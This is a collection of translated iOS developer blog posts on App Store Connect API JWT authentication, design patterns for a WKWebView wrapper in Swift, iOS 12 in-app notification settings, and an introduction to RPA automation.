This article was first published in Traditional Chinese on Medium ➡️ View Here
Understanding the implementation of AVPlayer/AVQueuePlayer with AVURLAsset using AVAssetResourceLoaderDelegate
First, I would like to deeply apologize to all the friends who have read the original article. Due to my recklessness in publishing the article without thorough research, some content was incorrect, wasting your precious time.
I have now restructured the entire context from scratch and rewritten the article. It includes a complete project program for everyone’s reference. Thank you!
Changes: About 30%
New Content: About 60%
Complete Guide to Implementing Local Cache with AVPlayer Click Here to View
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
App Store Connect API 2.0+ comprehensive update, supports In-app purchases, Subscriptions, Customer Reviews management
Upcoming transition from the XML feed to the App Store Connect API
This morning, I received the latest news from Apple developer relations announcing that the App Store Connect API now supports three new capabilities: In-app purchases, Subscriptions, and Customer Reviews management. This allows developers to integrate Apple’s development process with CI/CD or business backends more flexibly, closely, and efficiently!
I haven’t touched In-app purchases or Subscriptions, but Customer Reviews excites me. I previously published an article titled “AppStore APP’s Reviews Slack Bot” discussing ways to integrate App reviews with workflow.
Slack Review Bot — ZReviewsBot
Before the App Store Connect API supported this, there were only two ways to get iOS App reviews:
First was to subscribe to Public RSS, but this RSS feed couldn’t be flexibly filtered, provided limited information, had a quantity limit, and we occasionally encountered data corruption issues, making it very unstable.
Second was through Fastlane — Spaceship, which encapsulated complex web operations and session management to fetch review data from the App Store Connect backend (essentially running a web-simulating crawler against the backend).
important-note-about-session-duration by Fastlane
But because there was no other way, we could only keep doing this — until we received the news this morning…
⚠️ Note: The official plan is to cancel the original XML (RSS) access method in 2022/11.
I have developed a new “ ZReviewTender — Free and Open Source App Reviews Monitoring Bot “ based on the new App Store Connect API.
First, we need to log in to the App Store Connect backend, go to “Users and Access” -> “Keys” -> “ App Store Connect API “:
Click “+”, enter the name and permissions; for detailed permissions, refer to the official website instructions. To reduce testing issues, select “App Manager” to grant maximum permissions.
Click “Download API Key” on the right to download and save your “AuthKey_XXX.p8” Key.
⚠️ Note: This Key can only be downloaded once, please keep it safe. If lost, you can only Revoke the existing one & create a new one. ⚠️
⚠️ Do not leak the .p8 Key File ⚠️
curl -v -H 'Authorization: Bearer [signed token]' "https://api.appstoreconnect.apple.com/v1/apps"
Refer to official documentation.
{kid:"YOUR_KEY_ID", typ:"JWT", alg:"ES256"}
YOUR_KEY_ID: Refer to the image above.
{
  iss: 'YOUR_ISSUE_ID',
  iat: TOKEN creation time (UNIX timestamp, e.g. 1658326020),
  exp: TOKEN expiration time (UNIX timestamp, e.g. 1658327220),
  aud: 'appstoreconnect-v1'
}
YOUR_ISSUE_ID: Refer to the image above.
exp (TOKEN expiration time): It varies depending on the access function or settings; some tokens can be long-lived, while others expire after about 20 minutes and need to be regenerated. For details, refer to the official instructions.
jwt.rb:
require 'jwt'
require 'time'

keyFile = File.read('./AuthKey_XXXX.p8') # YOUR .p8 private key file path
privateKey = OpenSSL::PKey::EC.new(keyFile)

payload = {
  iss: 'YOUR_ISSUE_ID',
  iat: Time.now.to_i,
  exp: Time.now.to_i + 60 * 20,
  aud: 'appstoreconnect-v1'
}

token = JWT.encode payload, privateKey, 'ES256', { kid: "YOUR_KEY_ID", typ: "JWT" }
puts token

decoded_token = JWT.decode token, privateKey, true, { algorithm: 'ES256' }
puts decoded_token
The final JWT result will look something like this:
4oxjoi8j69rHQ58KqPtrFABBWHX2QH7iGFyjkc5q6AJZrKA3AcZcCFoFMTMHpM.pojTEWQufMTvfZUW1nKz66p3emsy2v5QseJX5UJmfRjpxfjgELUGJraEVtX7tVg6aicmJT96q0snP034MhfgoZAB46MGdtC6kv2Vj6VeL2geuXG87Ys6ADijhT7mfHUcbmLPJPNZNuMttcc.fuFAJZNijRHnCA2BRqq7RZEJBB7TLsm1n4WM1cW0yo67KZp-Bnwx9y45cmH82QPAgKcG-y1UhRUrxybi5b9iNN
With the token, we can try out the App Store Connect API!
curl -H 'Authorization: Bearer JWT' "https://api.appstoreconnect.apple.com/v1/apps/APPID/customerReviews"
APPID can be obtained from the App Store Connect backend, or from the App Store page URL, e.g. 557252416.
⚠️ You can only access the App review data for which you have permission ⚠️
I have put together a Ruby file that performs the above process; you can clone it, fill in your own details, and test it directly.
First-time setup:
bundle install
Getting started:
bundle exec ruby jwt.rb
Similarly, we can access the other management functions through the API (see the API Overview):
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Scenarios of using Design Patterns (Strategy, Chain of Responsibility, Builder Pattern) when encapsulating iOS WKWebView.
Photo by Dean Pugh
Before discussing Design Patterns, it is worth mentioning that the most classic GoF 23 design patterns were published 30 years ago (in 1994). With changes in tools, languages, and software development patterns, many new design patterns have emerged in various fields. Design Patterns are not a universal solution or the only solution. Their existence is more like a “linguistic term” where the appropriate design pattern is applied in suitable scenarios, reducing obstacles in development collaboration. For example, applying the Strategy pattern here allows future maintainers to iterate directly according to the structure of the Strategy pattern, and design patterns mostly decouple well, providing significant assistance in scalability and testability.
For example, a name like XXXFactory should not be used unless the type actually implements the Factory pattern.
With ChatGPT, learning the practical application of Design Patterns has become easier. Just provide a detailed description of your problem and ask which design patterns suit the scenario, and it can suggest several potentially suitable patterns with explanations. Not every answer is perfect, but it gives viable directions; by digging into these patterns and combining them with your practical scenario, you can ultimately arrive at a good solution!
This practical application of Design Patterns comes from consolidating the scattered WKWebView usages in our codebase into a unified WKWebView component; here I share the experience of applying Design Patterns at the appropriate points of logical abstraction while developing that component.
The complete demo project code will be attached at the end of the document.
import UIKit
import WebKit

class WKWebViewController: UIViewController {

    // MARK: - Variables and switches injected from outside at initialization...

    // Simulated business logic: switch to match special paths and open native pages
    let noNeedNativePresent: Bool
    // Simulated business logic: switch for the DeeplinkManager check
    let deeplinkCheck: Bool
    // Simulated business logic: is this the homepage?
    let isHomePage: Bool
    // Simulated business logic: scripts to inject into WKWebView as WKUserScript
    let userScripts: [WKUserScript]
    // Simulated business logic: scripts to inject into WKWebView as WKScriptMessageHandler
    let scriptMessageHandlers: [String: WKScriptMessageHandler]
    // Override the ViewController title with the title obtained from the WebView
    let overrideTitleFromWebView: Bool

    let url: URL

    // ...
}
// ...
extension WKWebViewController: WKNavigationDelegate {
    // MARK: - WKWebView's navigationAction delegate, used to decide how to handle the upcoming link
    // Must call decisionHandler(.allow) or decisionHandler(.cancel) at the end
    // decisionHandler(.cancel) interrupts loading of the upcoming page

    // Different variables and switches are handled with different logic here:

    func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) {
        guard let url = navigationAction.request.url else {
            decisionHandler(.allow)
            return
        }

        // Simulated business logic: WebViewController deeplinkCheck == true (check with DeepLinkManager and open the page)
        if deeplinkCheck {
            print("DeepLinkManager.open(\(url.absoluteString))")
            // Simulated DeepLinkManager logic: open the URL if successful and end the flow.
            // if DeepLinkManager.open(url) == true {
            decisionHandler(.cancel)
            return
            // }
        }

        // Simulated business logic: WebViewController isHomePage == true (this is the homepage) & the WebView is browsing the homepage, switch the TabBar index
        if isHomePage {
            if url.absoluteString == "https://zhgchg.li" {
                print("Switch UITabBarController to Index 0")
                decisionHandler(.cancel)
                return
            }
        }

        // Simulated business logic: WebViewController noNeedNativePresent == false (match special paths and open native pages)
        if !noNeedNativePresent {
            if url.pathComponents.count >= 3 {
                if url.pathComponents[1] == "product" {
                    // match http://zhgchg.li/product/1234
                    let id = url.pathComponents[2]
                    print("Present ProductViewController(\(id))")
                    decisionHandler(.cancel)
                    return
                } else if url.pathComponents[1] == "shop" {
                    // match http://zhgchg.li/shop/1234
                    let id = url.pathComponents[2]
                    print("Present ShopViewController(\(id))")
                    decisionHandler(.cancel)
                    return
                }
                // more...
            }
        }

        decisionHandler(.allow)
    }
}
// ...
The navigationAction delegate controls the flow internally based on these variables; if you need to remove or modify part of the flow or its order, you have to modify the whole method, which can easily break the parts that were working.
The Builder Pattern is a creational design pattern that separates the construction steps and logic of creating an object. The caller can set parameters step by step, reuse those settings, and finally create the target object; additionally, the same construction steps can produce different object implementations.
Using the Pizza example in the image above, the steps of making a Pizza are broken down into several methods and declared in the PizzaBuilder protocol (Interface). ConcretePizzaBuilder is the actual object that makes the Pizza, which could be a VegetarianPizzaBuilder or a MeatPizzaBuilder; different builders may use different ingredients, but they all ultimately call build() to produce a Pizza object.
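As a minimal Swift sketch of that diagram (the type names mirror the ones above; the ingredient details are made up for illustration):

struct Pizza {
    let toppings: [String]
}

protocol PizzaBuilder {
    func prepareDough() -> Self
    func addToppings() -> Self
    func build() -> Pizza
}

final class VegetarianPizzaBuilder: PizzaBuilder {
    private var toppings: [String] = []

    func prepareDough() -> VegetarianPizzaBuilder { return self }

    func addToppings() -> VegetarianPizzaBuilder {
        toppings.append(contentsOf: ["mushroom", "bell pepper"])
        return self
    }

    func build() -> Pizza {
        return Pizza(toppings: toppings)
    }
}

// The same construction steps; a MeatPizzaBuilder would differ only in its ingredients.
let pizza = VegetarianPizzaBuilder().prepareDough().addToppings().build()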
In the WKWebView scenario, our final output object is MyWKWebViewConfiguration. We consolidate all the variables that WKWebView needs into this object and use the Builder Pattern, MyWKWebViewConfigurator, to complete the construction of the configuration step by step.
public struct MyWKWebViewConfiguration {
    let headNavigationHandler: NavigationActionHandler?
    let scriptMessageStrategies: [ScriptMessageStrategy]
    let userScripts: [WKUserScript]
    let overrideTitleFromWebView: Bool
    let url: URL
}
// All parameters are only exposed internally within the module
Since I only need to build MyWKWebView here, I did not further break MyWKWebViewConfigurator down into multiple Protocols (Interfaces).
public final class MyWKWebViewConfigurator {

    private var headNavigationHandler: NavigationActionHandler? = nil
    private var overrideTitleFromWebView: Bool = true
    private var disableZoom: Bool = false
    private var scriptMessageStrategies: [ScriptMessageStrategy] = []

    public init() {

    }

    // Encapsulate the parameters; keep the details under internal control
    public func set(disableZoom: Bool) -> Self {
        self.disableZoom = disableZoom
        return self
    }

    public func set(overrideTitleFromWebView: Bool) -> Self {
        self.overrideTitleFromWebView = overrideTitleFromWebView
        return self
    }

    public func set(headNavigationHandler: NavigationActionHandler) -> Self {
        self.headNavigationHandler = headNavigationHandler
        return self
    }

    // Additional logic rules can be encapsulated inside
    public func add(scriptMessageStrategy: ScriptMessageStrategy) -> Self {
        scriptMessageStrategies.removeAll(where: { type(of: $0).identifier == type(of: scriptMessageStrategy).identifier })
        scriptMessageStrategies.append(scriptMessageStrategy)
        return self
    }

    public func build(url: URL) -> MyWKWebViewConfiguration {
        var userScripts: [WKUserScript] = []
        // Attach the scripts only when generating the configuration
        if disableZoom {
            let script = "var meta = document.createElement('meta'); meta.name='viewport'; meta.content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no'; document.getElementsByTagName('head')[0].appendChild(meta);"
            let disableZoomScript = WKUserScript(source: script, injectionTime: .atDocumentEnd, forMainFrameOnly: true)
            userScripts.append(disableZoomScript)
        }

        return MyWKWebViewConfiguration(headNavigationHandler: headNavigationHandler, scriptMessageStrategies: scriptMessageStrategies, userScripts: userScripts, overrideTitleFromWebView: overrideTitleFromWebView, url: url)
    }
}
Adding this extra layer also makes it easier to use Access Control to restrict how the parameters can be used. In this scenario, we still want to be able to inject WKUserScript into MyWKWebView directly, but we don’t want to leave the door wide open for callers to inject anything at will. Therefore, combining the Builder Pattern with Swift Access Control, once MyWKWebView is placed in a Module, MyWKWebViewConfigurator exposes an operation method func set(disableZoom: Bool) externally and internally generates the MyWKWebViewConfiguration with the attached WKUserScript. All parameters of MyWKWebViewConfiguration are immutable from outside and can only be produced through MyWKWebViewConfigurator.
Once we have the MyWKWebViewConfigurator Builder, we can create a simple factory to encapsulate and reuse the construction steps.
struct MyWKWebViewConfiguratorFactory {
    enum ForType {
        case `default`
        case productPage
        case payment
    }

    static func make(for type: ForType) -> MyWKWebViewConfigurator {
        switch type {
        case .default:
            return MyWKWebViewConfigurator()
                .add(scriptMessageStrategy: PageScriptMessageStrategy())
                .set(overrideTitleFromWebView: false)
                .set(disableZoom: false)
        case .productPage:
            return Self.make(for: .default).set(disableZoom: true).set(overrideTitleFromWebView: true)
        case .payment:
            // PaymentNavigationActionHandler is introduced in the Chain of Responsibility section below
            return MyWKWebViewConfigurator().set(headNavigationHandler: PaymentNavigationActionHandler())
        }
    }
}
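A minimal usage sketch (how MyWKWebViewController consumes the configuration is up to the demo project; the initializer below is an assumption for illustration):

// From within some view controller:
let configuration = MyWKWebViewConfiguratorFactory
    .make(for: .productPage)
    .build(url: URL(string: "https://zhgchg.li/product/1234")!)

// Assumed initializer; the real one lives in the demo project.
let controller = MyWKWebViewController(configuration: configuration)
navigationController?.pushViewController(controller, animated: true)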
The Chain of Responsibility Pattern is a behavioral design pattern: it encapsulates handling operations as objects and links them together in a chain. A request is passed along the chain until some node handles it, and the chained operations can be flexibly combined and reordered.
The Chain of Responsibility focuses on whether a node handles the incoming request; if not, it simply passes it on. A node is not supposed to partially handle the request or modify the input before passing it to the next one; if that is what you need, you are looking at the Interceptor Pattern instead.
The diagram above uses Tech Support (or on-call…) as an example. When a problem comes in, it first goes through CustomerService; if CustomerService cannot handle it, it is passed down to the next level, Supervisor, and if that still cannot handle it, it continues down to TechSupport. Different responsibility chains can also be formed for different issues; for example, a problem from a major client is handled starting directly from Supervisor. The UIKit Responder Chain in Swift also uses the Chain of Responsibility pattern to respond to user interactions on the UI.
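A minimal Swift sketch of that support chain (the types and the issue model are made up to mirror the diagram):

struct Issue {
    let description: String
    let isFromMajorClient: Bool
}

protocol SupportHandler: AnyObject {
    var next: SupportHandler? { get set }
    /// Returns true if this node handled the issue.
    func handle(_ issue: Issue) -> Bool
}

extension SupportHandler {
    // Walk the chain until some node handles the issue.
    func execute(_ issue: Issue) {
        if !handle(issue) {
            next?.execute(issue)
        }
    }
}

final class CustomerService: SupportHandler {
    var next: SupportHandler?
    func handle(_ issue: Issue) -> Bool {
        guard !issue.isFromMajorClient else { return false } // escalate major clients
        print("CustomerService handled: \(issue.description)")
        return true
    }
}

final class Supervisor: SupportHandler {
    var next: SupportHandler?
    func handle(_ issue: Issue) -> Bool {
        print("Supervisor handled: \(issue.description)")
        return true
    }
}

// Wire up the chain: CustomerService -> Supervisor
let customerService = CustomerService()
customerService.next = Supervisor()

customerService.execute(Issue(description: "Invoice question", isFromMajorClient: false))
customerService.execute(Issue(description: "Outage report", isFromMajorClient: true))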
In our WKWebView scenario, the pattern is mainly applied in the func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) delegate method.
When the WebView receives a URL request, it goes through this method so we can decide whether to allow the navigation, and we call decisionHandler(.allow) or decisionHandler(.cancel) at the end to report the result.
In a real WKWebView implementation there are many special-case judgments and page-specific handlings that need to intercept the navigation:
// Original implementation...
func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) {
    guard let url = navigationAction.request.url else {
        decisionHandler(.allow)
        return
    }

    // Simulated business logic: WebViewController deeplinkCheck == true (check with DeepLinkManager and open the page)
    if deeplinkCheck {
        print("DeepLinkManager.open(\(url.absoluteString))")
        // Simulated DeepLinkManager logic: open the URL if successful and end the flow.
        // if DeepLinkManager.open(url) == true {
        decisionHandler(.cancel)
        return
        // }
    }

    // Simulated business logic: WebViewController isHomePage == true (the homepage is open) & the WebView is browsing the homepage, switch the TabBar index
    if isHomePage {
        if url.absoluteString == "https://zhgchg.li" {
            print("Switch UITabBarController to Index 0")
            decisionHandler(.cancel)
            return
        }
    }

    // Simulated business logic: WebViewController noNeedNativePresent == false (match special paths and open native pages)
    if !noNeedNativePresent {
        if url.pathComponents.count >= 3 {
            if url.pathComponents[1] == "product" {
                // match http://zhgchg.li/product/1234
                let id = url.pathComponents[2]
                print("Present ProductViewController(\(id))")
                decisionHandler(.cancel)
                return
            } else if url.pathComponents[1] == "shop" {
                // match http://zhgchg.li/shop/1234
                let id = url.pathComponents[2]
                print("Present ShopViewController(\(id))")
                decisionHandler(.cancel)
                return
            }
            // more...
        }
    }

    // more...
    decisionHandler(.allow)
}
As time goes by and the functionality grows, the logic here keeps piling up; and since the processing order matters, it quickly becomes a disaster.
Define the Handler Protocol first:
public protocol NavigationActionHandler: AnyObject {
    var nextHandler: NavigationActionHandler? { get set }

    /// Handles the navigation action for the web view. Returns true if the action was handled, otherwise false.
    func handle(webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) -> Bool
    /// Executes the navigation action policy decision. If the current handler does not handle it, the next handler in the chain is executed.
    func exeute(webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void)
}

public extension NavigationActionHandler {
    func exeute(webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) {
        if !handle(webView: webView, decidePolicyFor: navigationAction, decisionHandler: decisionHandler) {
            self.nextHandler?.exeute(webView: webView, decidePolicyFor: navigationAction, decisionHandler: decisionHandler) ?? decisionHandler(.allow)
        }
    }
}
func handle() returns true if the node handles the request, otherwise false.
func exeute() is the default chain-traversal implementation; the whole operation chain is walked from here. The default behavior is that when func handle() returns false (meaning this node cannot handle the request), it automatically calls exeute() on the next nextHandler to continue processing until the end of the chain.
Implementation:
// Default implementation, usually placed at the end of the chain
public final class DefaultNavigationActionHandler: NavigationActionHandler {
    public var nextHandler: NavigationActionHandler?

    public init() {

    }

    public func handle(webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) -> Bool {
        decisionHandler(.allow)
        return true
    }
}

//
final class PaymentNavigationActionHandler: NavigationActionHandler {
    var nextHandler: NavigationActionHandler?

    func handle(webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) -> Bool {
        guard let url = navigationAction.request.url else {
            return false
        }

        // Simulated business logic: payment-related handling, two-step verification WebView, etc.
        print("Present Payment Verify View Controller")
        decisionHandler(.cancel)
        return true
    }
}

//
final class DeeplinkManagerNavigationActionHandler: NavigationActionHandler {
    var nextHandler: NavigationActionHandler?

    func handle(webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) -> Bool {
        guard let url = navigationAction.request.url else {
            return false
        }

        // Simulated DeepLinkManager logic: open the URL if successful and end the flow.
        // if DeepLinkManager.open(url) == true {
        decisionHandler(.cancel)
        return true
        // } else {
        //     return false
        // }
    }
}

// More...
extension MyWKWebViewController: WKNavigationDelegate {
    public func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) {
        let headNavigationActionHandler = DeeplinkManagerNavigationActionHandler()
        let defaultNavigationActionHandler = DefaultNavigationActionHandler()
        let paymentNavigationActionHandler = PaymentNavigationActionHandler()

        headNavigationActionHandler.nextHandler = paymentNavigationActionHandler
        paymentNavigationActionHandler.nextHandler = defaultNavigationActionHandler

        headNavigationActionHandler.exeute(webView: webView, decidePolicyFor: navigationAction, decisionHandler: decisionHandler)
    }
}
This way, when a request comes in, it is processed sequentially along the handling chain we defined.

Combined with the Builder Pattern `MyWKWebViewConfigurator` from before, exposing `headNavigationActionHandler` as a parameter allows external control over this WKWebView's processing requirements and their order:
extension MyWKWebViewController: WKNavigationDelegate {
    public func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) {
        configuration.headNavigationHandler?.execute(webView: webView, decidePolicyFor: navigationAction, decisionHandler: decisionHandler) ?? decisionHandler(.allow)
    }
}

//...
struct MyWKWebViewConfiguratorFactory {
    enum ForType {
        case `default`
        case productPage
        case payment
    }

    static func make(for type: ForType) -> MyWKWebViewConfigurator {
        switch type {
        case .default:
            // Simulating the default scenario with these handlers
            let deeplinkManagerNavigationActionHandler = DeeplinkManagerNavigationActionHandler()
            let homePageTabSwitchNavigationActionHandler = HomePageTabSwitchNavigationActionHandler()
            let nativeViewControllerNavigationActionHandler = NativeViewControllerNavigationActionHandler()
            let defaultNavigationActionHandler = DefaultNavigationActionHandler()

            deeplinkManagerNavigationActionHandler.nextHandler = homePageTabSwitchNavigationActionHandler
            homePageTabSwitchNavigationActionHandler.nextHandler = nativeViewControllerNavigationActionHandler
            nativeViewControllerNavigationActionHandler.nextHandler = defaultNavigationActionHandler

            return MyWKWebViewConfigurator()
                .add(scriptMessageStrategy: PageScriptMessageStrategy())
                .add(scriptMessageStrategy: UserScriptMessageStrategy())
                .set(headNavigationHandler: deeplinkManagerNavigationActionHandler)
                .set(overrideTitleFromWebView: false)
                .set(disableZoom: false)
        case .productPage:
            return Self.make(for: .default).set(disableZoom: true).set(overrideTitleFromWebView: true)
        case .payment:
            // Simulating a payment page with only these handlers, paymentNavigationActionHandler having the highest priority
            let paymentNavigationActionHandler = PaymentNavigationActionHandler()
            let deeplinkManagerNavigationActionHandler = DeeplinkManagerNavigationActionHandler()
            let defaultNavigationActionHandler = DefaultNavigationActionHandler()

            paymentNavigationActionHandler.nextHandler = deeplinkManagerNavigationActionHandler
            deeplinkManagerNavigationActionHandler.nextHandler = defaultNavigationActionHandler

            return MyWKWebViewConfigurator().set(headNavigationHandler: paymentNavigationActionHandler)
        }
    }
}
> _The Strategy Pattern belongs to the **behavioral** design patterns; it abstracts the actual operation so we can implement several different operations and swap them flexibly depending on the context._

The above diagram illustrates different payment methods. We abstract payment as a `Payment` Protocol (Interface), and each payment method provides its own implementation. When using `PaymentContext` (simulating external usage), the corresponding Payment entity is created based on the user's selected payment method, and `pay()` is called to process the payment.

#### WKWebView Scenario

> _Used in the interaction between the WebView and frontend pages._

> _When frontend JavaScript calls:_

> _`window.webkit.messageHandlers.Name.postMessage(Parameters);`_

> _WKWebView looks up the `WKScriptMessageHandler` class registered for `Name` and executes the operation._

The system already defines the protocol and the corresponding `func add(_ scriptMessageHandler: any WKScriptMessageHandler, name: String)` method. We only need to define our own `WKScriptMessageHandler` implementations and add them to the WKWebView; following the Strategy Pattern, the system then dispatches to the matching concrete strategy based on the received `name`.

Here, we simply extend `WKScriptMessageHandler` with our own protocol, adding an `identifier: String` for the `add(.. name:)` registration:

```swift
public protocol ScriptMessageStrategy: NSObject, WKScriptMessageHandler {
    static var identifier: String { get }
}
```

Implementation:
final class PageScriptMessageStrategy: NSObject, ScriptMessageStrategy {
    static var identifier: String = "page"

    func userContentController(_ userContentController: WKUserContentController, didReceive message: WKScriptMessage) {
        // Simulating a call from JS: window.webkit.messageHandlers.page.postMessage("Close");
        print("\(Self.identifier): \(message.body)")
    }
}

//

final class UserScriptMessageStrategy: NSObject, ScriptMessageStrategy {
    static var identifier: String = "user"

    func userContentController(_ userContentController: WKUserContentController, didReceive message: WKScriptMessage) {
        // Simulating a call from JS: window.webkit.messageHandlers.user.postMessage("Hello");
        print("\(Self.identifier): \(message.body)")
    }
}
WKWebView Registration:
var scriptMessageStrategies: [ScriptMessageStrategy] = []
scriptMessageStrategies.forEach { scriptMessageStrategy in
    webView.configuration.userContentController.add(scriptMessageStrategy, name: type(of: scriptMessageStrategy).identifier)
}
Combined with the Builder Pattern `MyWKWebViewConfigurator` from before, the registration of `ScriptMessageStrategy` can be managed externally:
public final class MyWKWebViewConfigurator {
    //...

    // The rules for adding strategies can be encapsulated here
    public func add(scriptMessageStrategy: ScriptMessageStrategy) -> Self {
        // If a strategy with the same identifier already exists, remove the old one first (the new one wins)
        scriptMessageStrategies.removeAll(where: { type(of: $0).identifier == type(of: scriptMessageStrategy).identifier })
        scriptMessageStrategies.append(scriptMessageStrategy)
        return self
    }
    //...
}

//...

public class MyWKWebViewController: UIViewController {
    //...
    public override func viewDidLoad() {
        super.viewDidLoad()

        //...
        configuration.scriptMessageStrategies.forEach { scriptMessageStrategy in
            webView.configuration.userContentController.add(scriptMessageStrategy, name: type(of: scriptMessageStrategy).identifier)
        }
        //...
    }
}
At this point, some readers may wonder whether the Strategy Pattern here could be replaced with the Chain of Responsibility Pattern.

Both are behavioral design patterns and can substitute for each other; the actual choice depends on the requirements. In this case the Strategy Pattern is the textbook fit: WKWebView selects a different strategy based on the `name`. If the requirement involved chained dependencies or fallback relationships between strategies, such as AStrategy passing the work on to BStrategy when it cannot handle it, the Chain of Responsibility Pattern would be the better choice.

Strategy vs. Chain of Responsibility

For complex scenarios, you can also combine the two, nesting a Chain of Responsibility inside a Strategy to achieve the desired outcome.
- `MyWKWebViewConfiguratorFactory` → encapsulates the steps for generating a `MyWKWebViewConfigurator`
- `MyWKWebViewConfigurator` → encapsulates the `MyWKWebViewConfiguration` parameters and construction steps
- `MyWKWebViewConfiguration` → used by `MyWKWebViewController`
- `MyWKWebViewController`'s `func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void)` → calls `headNavigationHandler?.execute(webView: webView, decidePolicyFor: navigationAction, decisionHandler: decisionHandler)` for chained handling
- `MyWKWebViewController`'s `webView.configuration.userContentController.add(_:name:)` registration → dispatches each JS caller to its corresponding handling strategy

If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Besides turning off notifications from the system, give users other options
We continue to improve push notifications, whether it’s existing technology or newly available features, let’s give them a try!
iOS ≥ 12 allows you to add a shortcut to your app’s notification settings page in the user’s “Settings,” giving users other options when they want to adjust notifications; they can jump to “in-app” instead of turning off notifications directly from the “system.” Here’s a preview:
Settings -> App -> Notifications -> In-App Settings
Additionally, when users receive notifications and want to use 3D Touch to adjust settings to “turn off” notifications, there will be an extra “In-App Settings” option for users to choose from.
Notifications -> 3D Touch -> … -> Turn Off… -> In-App Settings
The implementation is very simple. The first step is to request the additional `.providesAppNotificationSettings` option when asking for push notification permission.
//appDelegate.swift didFinishLaunchingWithOptions or....
if #available(iOS 12.0, *) {
    let center = UNUserNotificationCenter.current()
    let permissions: UNAuthorizationOptions = [.badge, .alert, .sound, .provisional, .providesAppNotificationSettings]
    center.requestAuthorization(options: permissions) { (granted, error) in
        // Handle the authorization result here if needed
    }
}
After asking the user whether to allow notifications, the in-app settings option shown below will appear (regardless of whether the user previously allowed or disallowed notifications).

The second and final step: make the AppDelegate conform to the `UNUserNotificationCenterDelegate` protocol and implement the `userNotificationCenter(_ center: UNUserNotificationCenter, openSettingsFor notification: UNNotification?)` method!
//appDelegate.swift
import UserNotifications
@UIApplicationMain
class AppDelegate: UIResponder, UIApplicationDelegate {
    var window: UIWindow?
    func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -> Bool {
        if #available(iOS 10.0, *) {
            UNUserNotificationCenter.current().delegate = self
        }

        return true
    }
    //Other parts omitted...
}
extension AppDelegate: UNUserNotificationCenterDelegate {
    @available(iOS 10.0, *)
    func userNotificationCenter(_ center: UNUserNotificationCenter, openSettingsFor notification: UNNotification?) {
        //Navigate to your in-app notification settings page..
        //EX:
        //let settingsViewController = SettingViewController()
        //self.window?.rootViewController?.present(settingsViewController, animated: true)
    }
}
Completed! Compared to the previous articles, this feature implementation is very simple 🏆
This feature is somewhat similar to the one mentioned in the previous article, where we send low-interference silent push notifications to users without requiring their authorization to test the waters!
Both features aim to build a new bridge between developers and users. In the past, if an app was too noisy, we would mercilessly go to the settings page and turn off all notifications. However, this means that developers can no longer send any notifications, whether good or bad, useful or not, to the users. Consequently, users might miss important messages or exclusive offers.
This feature allows users to have the option to adjust notifications within the app when they want to turn them off. Developers can segment push notification items, allowing users to decide what type of push notifications they want to receive.
For the Wedding App, if users find the column notifications too intrusive, they can turn them off individually; but they can still receive important system messages.
p.s. The individual notification toggle feature is something our app already had, but by combining it with the new notification features in iOS ≥12, we can achieve better results and improve user experience.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Implementing Robotic Process Automation for Google Workspace services using Google Apps Script
Photo by Possessed Photography
RPA (Robotic Process Automation) literally means "process automation robots." Looking back at human history, from hand-gathering to the Stone Age, then to agricultural civilization, from the industrial revolution of the last century to the information boom of the past 20 years, human work efficiency and productivity have grown exponentially. Along the way, RPA-like applications have been everywhere: waterwheels in the agricultural era (automated threshing), textile machines in the industrial revolution (automated weaving), factory robotic arms (automated assembly), and finally the automated information work introduced in this article, such as automatic report queries and automatic notifications.
Embarrassingly, I only recently learned this term. Since my first job (7 years ago), I have been doing RPA-related work, such as writing crawlers to collect statistics, automating CI/CD processes, automating data queries, automating stability data alerts, and automating daily routine operations. However, I used to refer to it simply as “automation.” It’s time to give it a proper name — RPA (Robotic Process Automation).
Previously, my RPA efforts focused more on “writing code to automate tasks to solve single problems,” lacking comprehensive preliminary evaluation and analysis, the use of No/Low Code tools, regulations, operational monitoring, actual data statistics, continuous improvement, corporate culture promotion, and so on. These are all essential aspects of complete RPA. However, as mentioned earlier, I only recently learned about this professional field, so let me start with a practical article!
There are many platforms providing RPA services, such as Automation Anywhere, UiPath, Microsoft Power Automate, Blue Prism, or Zapier, IFTTT, Automate.io. You need to choose the appropriate service based on the actual problem you want to solve and the platform.
I recommend a free open-source browser-based RPA tool: Automa.
Broadly speaking, transforming the active dependence between people or between people and tasks into dependence on platforms is also a form of RPA.
For example: using project management tools like Asana/Jira to manage work tasks uniformly.
Based on the concept of transforming active to passive, we can also implement an RPA for services that originally required manual checks for new notifications, automatically notifying us when there are new changes.
For example: The previously implemented Gmail to Slack forwards specific notification emails to the work group.
